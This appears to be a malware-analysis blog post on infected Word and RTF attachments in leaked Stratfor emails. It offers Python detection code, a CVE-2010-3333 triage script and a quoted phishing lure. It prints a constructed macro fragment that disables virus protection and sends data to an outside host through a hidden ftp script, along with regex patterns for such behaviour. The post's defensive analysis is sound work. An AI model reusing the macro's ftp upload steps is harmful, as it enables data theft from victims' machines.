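# (label, regex, weight) -- weights are my own rough choices, not a published scheme
INDICATORS = [
    ("auto_exec",        r"\b(AutoOpen|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b", 2),
    ("av_disable",       r"Options\.VirusProtection\s*=\s*False", 3),
    ("self_replication", r"VBProject\.VBComponents|CodeModule\.(AddFromString|DeleteLines)", 3),
    ("file_write",       r"\bOpen\s+.+?\s+For\s+Output\b", 1),
    ("shell_exec",       r"\bShell\b", 2),
    ("ftp_script",       r"ftp(\.exe)?\s+-n\s+-s:", 3),
    ("hidden_window",    r"\bvbHide\b", 1),
    ("profile_string",   r"PrivateProfileString", 1),
    ("error_suppress",   r"On Error Resume Next", 1),
]


def score_macro(src):
    """Return (total_score, {label: weight}) for every indicator present in src."""
    hits = {}
    for label, pattern, weight in INDICATORS:
        if re.search(pattern, src, flags=re.IGNORECASE):
            hits[label] = weight
    return sum(hits.values()), hits


def extract_ftp_targets(src):
    """Pull host arguments out of 'o <host>' / 'open <host>' lines written into an
    ftp -s script; these are the addresses worth blocking or watching for."""
    return re.findall(r'"(?:o|open)\s+([0-9A-Za-z.\-]+)"', src)


def verdict(src, threshold=6):
    """Coarse triage label from the score; the threshold is an assumption."""
    score, _ = score_macro(src)
    return "suspicious" if score >= threshold else "low"


# Constructed fragment (not the full macro) using the same calls and the same
# 209.201.88.110 drop address that appear in the post.
SAMPLE_MALICIOUS = r'''
Private Sub Document_Close()
On Error Resume Next
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Options.VirusProtection = False
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End Sub
'''

# Constructed benign macro for comparison.
SAMPLE_BENIGN = r'''
Sub FormatFirstTable()
    ActiveDocument.Tables(1).Borders.Enable = True
End Sub
'''

if __name__ == "__main__":
    print(score_macro(SAMPLE_MALICIOUS))          # (17, {... all nine labels ...})
    print(extract_ftp_targets(SAMPLE_MALICIOUS))  # ['209.201.88.110']
    print(verdict(SAMPLE_BENIGN))                 # low
```

Feed it the text that a VBA extractor (olevba or OfficeMalScanner's info mode) produces for a document; the scorer is deliberately behaviour-based so that it still fires on a Marker.T variant whose marker string or log-file name has been changed.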
Using OfficeMalScanner provides further information:
[*] SCAN mode selected
[*] Opening file 117870_Hybrid write-up2.doc
[*] Filesize is 604672 (0x93a00) Bytes
[*] Ms Office OLE2 Compound Format document detected
[*] Scanning now...
+++++ decryption loop detected at offset: 0x00019eb8 +++++
33C9        xor ecx, ecx
E7EE        out EEh, eax
2974E835    sub [eax+ebp*8+35h], esi
79F7        jns $-07h
34A2        xor al, A2h
12F5        adc dh, ch
72F7        jb $-07h
94          xchg esp, eax
BA0EE6EEA9  mov edx, A9EEE60Eh
7909        jns $+0Bh
E615        out 15h, al
774F        jnbe $+51h
51          push ecx
B42F        mov ah, 2Fh
EE          out dx, al
9E          sahf
--------------------------------------------------------------------------
Brute-forcing for encrypted PE- and embedded OLE-files now...
Bruting XOR Key: 0x01
....
Analysis finished!
------------------------------------------------------------------------
117870_Hybrid write-up2.doc seems to be malicious! Malicious Index = 10
------------------------------------------------------------------------
There appears to be an additional, encrypted payload in these files, in addition to the VBA macro that sits on top. One caveat: OfficeMalScanner's "decryption loop" finding is a byte-pattern heuristic, and the listing above (privileged out instructions, xchg esp, eax, a stray sahf) reads more like disassembled data than a real decoder loop, so it needs confirming by hand before the Malicious Index is taken at face value. Uncovering it will take me a bit more time.
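The brute-force pass OfficeMalScanner reports above is simple enough to reproduce by hand when you want to confirm or rule out its finding. The following Python is an added example written for this post, not OfficeMalScanner's own code: it tries every single-byte XOR key against the whole file, looks for the decoded DOS stub string, walks back to the MZ header and returns the key and offset, after which the embedded file can be carved. The container it builds for the demonstration is constructed, and the "PE" inside it is only a header stub, not a runnable executable; the 0x200 search window is this example's assumption.

```python
DOS_STUB = b"This program cannot be run in DOS mode"
# The DOS stub string sits a few dozen bytes after "MZ" in a normal PE;
# 0x200 is this example's search window, not a format constant.
MAX_STUB_DISTANCE = 0x200


def xor_bytes(data, key):
    """XOR every byte of data with a single-byte key (0-255)."""
    return bytes(b ^ key for b in data)


def find_xor_encoded_pe(data, keys=range(256)):
    """Try every key, look for the decoded DOS stub, then walk back to 'MZ'.

    Returns a list of (key, offset) pairs. Key 0 is included so an embedded
    PE stored in the clear is reported too. A constant-key XOR never moves
    bytes, so offsets found in the decoded copy are offsets into the original
    file, which is what makes this brute force cheap.
    """
    hits = []
    for key in keys:
        plain = xor_bytes(data, key)
        pos = plain.find(DOS_STUB)
        while pos != -1:
            mz = plain.rfind(b"MZ", max(0, pos - MAX_STUB_DISTANCE), pos)
            if mz != -1:
                hits.append((key, mz))
            pos = plain.find(DOS_STUB, pos + 1)
    return hits


def carve(data, key, offset, length):
    """Decode length bytes of the embedded file that starts at offset."""
    return xor_bytes(data[offset:offset + length], key)


def build_sample(key=0x5A, prefix_len=0x1000):
    """Constructed input: a fake PE header (MZ, DOS stub, 'PE' signature,
    not a real executable) XORed with key and buried after prefix_len bytes
    of deterministic filler. Returns (container_bytes, fake_pe_bytes)."""
    fake_pe = (b"MZ" + b"\x90" * 58 + b"\x80\x00\x00\x00"      # e_lfanew = 0x80
               + b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
               + DOS_STUB + b".\r\r\n$" + b"\x00" * 7 + b"PE\x00\x00")
    filler = bytes((i * 131 + 7) & 0xFF for i in range(prefix_len))
    return filler + xor_bytes(fake_pe, key) + filler[:64], fake_pe


if __name__ == "__main__":
    container, _ = build_sample()
    for key, offset in find_xor_encoded_pe(container):
        print("key=0x%02x offset=0x%x" % (key, offset))
```

OfficeMalScanner also tries ADD and ROL variants and looks for embedded OLE signatures; the XOR case above is the one worth running first because a true hit gives you a carveable file, whereas the heuristic "decryption loop" match on its own gives you nothing to pull out.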
In addition to these three files I have also been working on a fourth file that uses a different exploit, 6566_TheSplitBetw.doc. Don't be fooled by the .DOC extension: this is an RTF file (Word opens files by content, not by extension). 6566_TheSplitBetw.doc uses a classic RTF exploit, CVE-2010-3333, a stack buffer overflow in Word's parsing of the pFragments shape property that Microsoft fixed in MS10-087.
md5 d93e2a5f8ac23824abc07f536aa4c50d
sha1 87584d1f761c3d8f34c4077da5aeadd4b1a470ca
sha256 e74fc919fba1cc8e9bc9680f026df8d4875c9f0f5864596445859ff916898b38
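Added example, not from the post: a Python triage step that classifies a file by its magic bytes instead of its extension, computes the three hashes in the form listed above so a sample can be cross-referenced, and flags the CVE-2010-3333 pFragments pattern, where a `{\sn pFragments}{\sv ...}` value far longer than a legitimate fragment list overruns a fixed-size stack buffer. The `SV_LEN_THRESHOLD` is this example's own heuristic, not a documented limit, and the sample RTFs are constructed, not 6566_TheSplitBetw.doc.

```python
import hashlib
import re

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # Compound File Binary header
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML (.docx) is a zip
SV_LEN_THRESHOLD = 64  # assumption: a genuine pFragments list is a few bytes

# {\sn pFragments}{\sv <value>} is the shape property the bug lives in.
_PFRAG_RE = re.compile(rb"\{\\sn\s+pFragments\s*\}\s*\{\\sv\s+([^}]*)\}", re.I)


def container_type(data):
    """Classify a file by its leading bytes, ignoring the extension."""
    if data.lstrip().startswith(b"{\\rtf"):
        return "rtf"
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip-or-ooxml"
    return "unknown"


def hashes(data):
    """md5/sha1/sha256 hex digests, the same three the post lists."""
    return {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256")}


def pfragments_findings(data):
    """(offset, value_length) for every pFragments value over the threshold."""
    return [(m.start(), len(m.group(1))) for m in _PFRAG_RE.finditer(data)
            if len(m.group(1)) > SV_LEN_THRESHOLD]


def triage(data):
    """Container type, hashes and a CVE-2010-3333 verdict for one file."""
    kind = container_type(data)
    hits = pfragments_findings(data) if kind == "rtf" else []
    return {"container": kind, "hashes": hashes(data),
            "pfragments_hits": hits, "suspected_cve_2010_3333": bool(hits)}


# Constructed samples; none of these is the file from the post.
BENIGN_RTF = (b"{\\rtf1\\ansi{\\shp{\\*\\shpinst{\\sp{\\sn pFragments}"
              b"{\\sv 1;1;0000}}}}Hello}")
EXPLOIT_LIKE_RTF = (b"{\\rtf1\\ansi{\\shp{\\*\\shpinst{\\sp{\\sn pFragments}{\\sv 1;1;"
                    + b"41" * 400 + b"}}}}}")
OLE2_STUB = OLE2_MAGIC + b"\x00" * 504

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_RTF), ("exploit-like", EXPLOIT_LIKE_RTF),
                       ("ole2", OLE2_STUB)):
        print(name, triage(blob)["container"], triage(blob)["suspected_cve_2010_3333"])
```

The regex check is deliberately loose: a real sample may spread the shape across whitespace or nest extra groups, so treat a hit as a reason to open the file in an RTF-aware parser, and treat a miss on a file that other evidence says is hostile as no evidence at all.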
This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:
-----Original Message-----
From: CDR Courtney Bricks [mailto:cbricks@gmail.com]
Sent: Tuesday, May 31, 2011 11:23 PM
To: xxxxxx
Subject: Defense News article of interest
Sir,
Defense News article by Chris Cavas, from your interview last week is pasted below. Article appeared as a straight Q and A story, everything reads balanced and fair. Please let me know if you have any questions or concerns.
V/r,
Courtney
The U.S. Navy's major shipbuilding and aviation programs are largely settling into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.
In May 2011 the same exploit was also used as the attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified", which was sent to a significant number of US government email addresses.
The payloads differed between the two campaigns. The exploit itself is public: a Metasploit file-format module for it exists (ms10_087_rtf_pfragments_bof), and Microsoft patched the bug in MS10-087 in November 2010.
I've been working on reverse engineering this code as well. This file does not contain VBA macros (RTF has no macro storage of its own). The most interesting detail I have found, apart from what is already well documented about this exploit, was recovered by scraping a portion of the shellcode using this Python script (JavaScript needs to be enabled to see the GitHub embed, or you can view it here instead; the extraction script was provided by Alexander Hanel, though Mr Hanel did not collaborate on this project):
This is what was recovered (another github embed that can be viewed here for those who don't trust someone else's javascript):
I am still in the process of investigating this, however I am particularly interested in the creation of an executable, C:\a.exe, as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name of the Italian colony and historical region around Tripoli in the early 20th century. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little bit of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:
"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."
At this point few conclusions can be drawn from this information beyond the obvious one: those downloading this content from Wikileaks must take significant security measures to protect the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the malware-infected ones identified here as part of their coverage of these document leaks; it is possible, for example, to search and download emails and attachments directly from the Wikileaks site. It does not take a wild imagination to see that those initially reviewing these documents may take significant security precautions, while such precautions become less vital through the editing process until very few are taken by the end user, who expects this content to have been sanitized before a media organization provides it.
When downloading and viewing these files, most people are trying to protect themselves from surveillance, things like the NSA's XKEYSCORE. Few users expect the leaked files themselves to be a threat. While there is overlap between the precautions that protect a computer against outside surveillance and those that protect it against infected files, there are significant differences. Air gapping, for example, can be an effective deterrent against surveillance and against some of the worst features of malware. However, the threat from surveillance is often considered transitory: after performing the task that needs to be protected from prying eyes, a user might not find it unreasonable to break the air gap and reconnect to the internet after deleting their secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a networked one. All such activity is easily exploited by malicious software. To use a related analogy: Tor won't protect you from a keylogger.
This is why notification of malicious software in these files is important: so users can adjust their operational security plans to account for it.
There are a number of theories that could account for the presence of this malicious software. Perhaps the least wild-eyed is that Stratfor employees were receiving these malicious files through email. Whether or not those employees did anything with them, the files could have been retrieved by Lulzsec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails, perhaps so massive that roughly two years was not long enough to properly review and sanitize these files before their complete publication in 2014 (from the time they were received by WL sometime around 2012).
That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been heavily invested in the destruction of Wikileaks could very well be capable of placing malicious software on a remote server, or of redirecting a file transfer so that malicious software was delivered in its place.
This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" is of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.
The good news is this: the malware I have so far identified is old. So old that those using up-to-date versions of the software noted as vulnerable earlier are very likely safe even when opening these files. I scanned a number of these files using VirusTotal, and a significant number of antivirus engines were able to detect an issue with the files. The flip side of this positive spin is that at best only about half of the antivirus engines that scanned these files (roughly 70 in total) detected malicious software; some files were flagged by only 15 engines.
One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.
NOTE: my second post on this topic is online, and contains further malware analysis.
Hector Monsegur, formerly sabu of Lulzsec, contacted me. Our discussion is available on my third post.